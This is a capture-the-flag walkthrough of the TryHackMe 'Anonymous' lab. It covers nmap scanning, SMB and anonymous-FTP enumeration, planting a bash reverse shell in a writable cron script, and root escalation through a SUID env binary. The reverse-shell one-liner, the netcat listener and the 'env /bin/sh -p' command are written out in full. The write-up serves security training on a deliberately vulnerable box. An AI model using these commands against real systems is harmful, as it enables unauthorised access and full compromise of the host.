# Writeup [Anonymous](https://tryhackme.com/room/anonymous) ## > Let's connect and start the box > as soon as we get ip first start the port scan. > ***==nmap -p- -A -Pn <ip>==*** ``` PORT STATE SERVICE REASON 21/tcp open ftp syn-ack | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts [NSE: writeable] | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.4.67.68 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh syn-ack | ssh-hostkey: | 2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDCi47ePYjDctfwgAphABwT1jpPkKajXoLvf3bb/zvpvDvXwWKnm6nZuzL2HA1veSQa90ydSSpg8S+B8SLpkFycv7iSy2/Jmf7qY+8oQxWThH1fwBMIO5g/TTtRRta6IPoKaMCle8hnp5pSP5D4saCpSW3E5rKd8qj3oAj6S8TWgE9cBNJbMRtVu1+sKjUy/7ymikcPGAjRSSaFDroF9fmGDQtd61oU5waKqurhZpre70UfOkZGWt6954rwbXthTeEjf+4J5+gIPDLcKzVO7BxkuJgTqk4lE9ZU/5INBXGpgI5r4mZknbEPJKS47XaOvkqm9QWveoOSQgkqdhIPjnhD | 256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPjHnAlR7sBuoSM2X5sATLllsFrcUNpTS87qXzhMD99aGGzyOlnWmjHGNmm34cWSzOohxhoK2fv9NWwcIQ5A/ng= | 256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDHIuFL9AdcmaAIY7u+aJil1covB44FA632BSQ7sUqap 139/tcp open netbios-ssn syn-ack 445/tcp open microsoft-ds syn-ack Host script results: |_clock-skew: mean: 0s, deviation: 1s, median: 0s | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 45858/tcp): CLEAN (Couldn't connect) | Check 2 (port 40699/tcp): CLEAN (Couldn't connect) | Check 3 (port 37880/udp): CLEAN (Failed to receive data) | Check 4 (port 23981/udp): CLEAN (Failed to receive data) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked | nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | Names: | ANONYMOUS<00> Flags: <unique><active> | ANONYMOUS<03> Flags: <unique><active> | ANONYMOUS<20> Flags: <unique><active> | \x01\x02__MSBROWSE__\x02<01> Flags: <group><active> | WORKGROUP<00> Flags: <group><active> | WORKGROUP<1d> Flags: <unique><active> | WORKGROUP<1e> Flags: <group><active> | Statistics: | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | smb-os-discovery: | OS: Windows 6.1 (Samba 4.7.6-Ubuntu) | Computer name: anonymous | NetBIOS computer name: ANONYMOUS\x00 | Domain name: \x00 | FQDN: anonymous |_ System time: 2022-06-18T14:21:43+00:00 | smb2-time: | date: 2022-06-18T14:21:43 |_ start_date: N/A | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 3.1.1: ``` ### So let's answer the basic qustion asked - [x] **No of ports open - 4** - [x] **Service running on port - 21** - [x] **Service running on the port 139,445 - smb** ## Let's start the enumeration > First and the most interesting thing we find in smb is running on it let's find what in it!! ***==smbclient -L <ip>==*** ``` Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers pics Disk My SMB Share Directory for Pics IPC$ IPC IPC Service (anonymous server (Samba, Ubuntu)) Reconnecting with SMB1 for workgroup listing. Server Comment --------- ------- Workgroup Master --------- ------- WORKGROUP ANONYMOUS ``` let's check every shares there. ***==smbclient //<ip>/sharename==*** >Nothing found in `print$` and `IPC$`. But there were some images in pics but they were also of no use.   >Now let's check the `ftp`service going on   >Now let's check the files that we retrieved >`clean.sh`  >removed_files.log  >`to_do.txt`  >We can see there is read write permission on clean.sh and it is getting executed too and the the data goes to removed_files.log.So we got the idea and that is getting **reverse shell** on it lets change the `clean.sh` ***==`vim clean.sh`==*** ``` #!/bin/bash bash -i >& /dev/tcp/<ip>of your system/9005 0>&1 python -c 'import pty; pty.spawn("/bin/bash")' ``` >lets send it to ftp by **==`put clean.sh`==** >the now listen on our local machine ***==nc -lnvp 9005==***  ## Here come the user flag  ## Now let's do privilage exclation and get root flag >lets find suid binaries for privillage escallation ***==find / -perm 4000 2>/dev/null==***  >we can see among all binary env is the one that usually doesn't have suid . > We can search for privillage escallation throught env by cheat sheet from [Gtfobin](https://https://gtfobins.github.io/) lets use ***==/usr/bin/env /bin/sh -p==*** >And that's what webcome root just cat root.txt from root